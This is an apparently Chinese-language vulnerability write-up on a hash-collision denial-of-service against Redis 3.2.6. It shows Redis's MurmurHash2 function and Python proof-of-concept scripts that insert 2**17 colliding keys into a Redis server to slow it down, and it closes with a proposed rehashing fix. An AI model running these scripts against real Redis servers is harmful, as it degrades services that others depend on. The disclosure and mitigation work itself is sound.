作者:黑池白泽
测试平台: i3-3210,8G Ram, Redis3.2.6,位于虚拟机中(2 cores CPU, 2G Ram)
Redis3.2.6中使用的Murmurhash2函数:
unsigned int mmhash_32(const void *key, int len) {
/* 'm' and 'r' are mixing constants generated offline.
They're not really 'magic', they just happen to work well. */
const uint32_t m = 0x5bd1e995;
const int r = 24;
/* Initialize the hash to a 'random' value */
uint32_t h = 5381 ^ len;
/* Mix 4 bytes at a time into the hash */
const unsigned char *data = (const unsigned char *)key;
while(len >= 4) {
uint32_t k = *(uint32_t*)data;
k *= m;
k ^= k >> r;
k *= m;
h *= m;
h ^= k;
data += 4;
len -= 4;
}
/* Handle the last few bytes of the input array */
switch(len) {
case 3: h ^= data[2] << 16;
case 2: h ^= data[1] << 8;
case 1: h ^= data[0]; h *= m;
};
/* Do a few final mixes of the hash to ensure the last few
* bytes are well-incorporated. */
h ^= h >> 13;
h *= m;
h ^= h >> 15;
return (unsigned int)h;
}
poc_collision.py,用于验证碰撞函数(其中mmhash将Redis3.2.6的dictGenHashFunction封装以供Python调用,基于mmhash 魔改而来):
# -*- coding:utf-8 -*-
import mmhash
from murmurhash2_collision import collision
from binascii import crc32
c_l = list(collision(5))
hashs = (mmhash.get_hash_32(c) for c in c_l)
crc32ed_collisions = (crc32(c) for c in c_l)
print "crc32ed collision" + "\t" + "MurmurHash2ed collision"
for pair in zip(crc32ed_collisions, hashs):
print "{0}\t{1}".format(*pair)
输出结果: 可见确实发生碰撞。
poc_redis.py,用以对比Redis3.2.6对同等数量恶意与非恶意数据的响应:
# -*- coding:utf-8 -*-
import redis
import os
import time
from murmurhash2_collision import collision
BLOCK = 17
connection = redis.Redis(host="192.168.107.102", password="123456")
func_set = connection.set
connection.flushall()
print "Insert 2**{0} normal key-value pairs.".format(BLOCK)
start = time.time()
first_key = os.urandom(8*BLOCK)
func_set(name=first_key, value="")
for i in xrange(0, 2**BLOCK-1):
func_set(os.urandom(8*BLOCK), value="")
end = time.time()
print "Insertion complete. It takes {1} seconds.".format(BLOCK, end - start)
print "Now get the first inserted key."
start = time.time()
connection.get(first_key)
end = time.time()
print "It takes {0} seconds.".format(end - start)
print "*"*32
print "Now flush all the data."
connection.flushall()
print "Now insert 2**{0} key-value pairs with collisional strings as keys.".format(BLOCK)
c = list(collision(BLOCK))
first_key = c[0]
func_set(name=first_key, value="")
start = time.time()
for ck in c:
func_set(name=ck, value="")
end = time.time()
print "Insertion complete. It takes {1} seconds.".format(BLOCK, end - start)
print "Now get the first inserted key."
start = time.time()
connection.get(first_key)
end = time.time()
print "It takes {0} seconds.".format(end - start)
插入普通随机数据时Redis服务器负载与插入恶意数据时服务器负载对比:
输出结果: 可见在输入大量恶意数据后Redis的响应速度有了明显下降(已排除生成碰撞字符串的时间)。
Redis hashtable目前处理碰撞的方法是直接将发生碰撞的项用链表相连。建议碰撞发生时使用另一个不同的哈希函数进行rehash(比如time33),若与现有项再次发生碰撞,再使用链表将项相连。在我的认知范围内(也许不完全正确),针对两个不同的哈希算法稳定构造碰撞是困难的。